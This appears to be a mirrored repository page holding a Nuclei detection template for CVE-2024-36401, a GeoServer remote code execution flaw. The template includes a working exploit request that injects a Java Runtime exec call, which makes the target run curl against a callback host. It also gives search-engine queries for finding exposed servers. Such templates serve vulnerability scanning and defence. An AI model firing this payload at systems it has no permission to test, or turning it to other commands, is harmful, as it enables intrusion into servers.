daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2024/CVE-2024-36401.yaml

68 lines
2.1 KiB
YAML
Raw Blame History

id: CVE-2024-36401
info:
name: GeoServer RCE in Evaluating Property Name Expressions
author: DhiyaneshDk,ryanborum
severity: critical
description: |
In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.
impact: |
This vulnerability can lead to executing arbitrary code.
reference:
- https://x.com/sirifu4k1/status/1808270303275241607
- https://nvd.nist.gov/vuln/detail/CVE-2024-36401
- https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401
- https://github.com/advisories/GHSA-6jj6-gm7p-fcvv
metadata:
verified: true
max-request: 1
vendor: osgeo
product: geoserver
shodan-query: "Server: GeoHttpServer"
fofa-query:
- title="geoserver"
- app="geoserver"
google-query: intitle:"geoserver"
tags: cve,cve2024,geoserver,rce,unauth,kev
flow: |
if(http(1))
{
set("name",template.typename[0])
http(2)
}
http:
- raw:
- |
GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1
Host: {{Hostname}}
host-redirects: true
extractors:
- type: regex
name: typename
part: body
group: 1
regex:
- typeName=([^&\]]+)
internal: true
- raw:
- |
@timeout 20s
GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames={{name}}&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: content_type
words:
- "application/xml"
# digest: 4a0a00473045022050a925671a91913f98317b73a4f3cda362d8a355507459097e4288b9a30eb0b8022100ce59a57d605ac794ee5929feec3cb4238e33483384b7735a20fdce903db76366:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink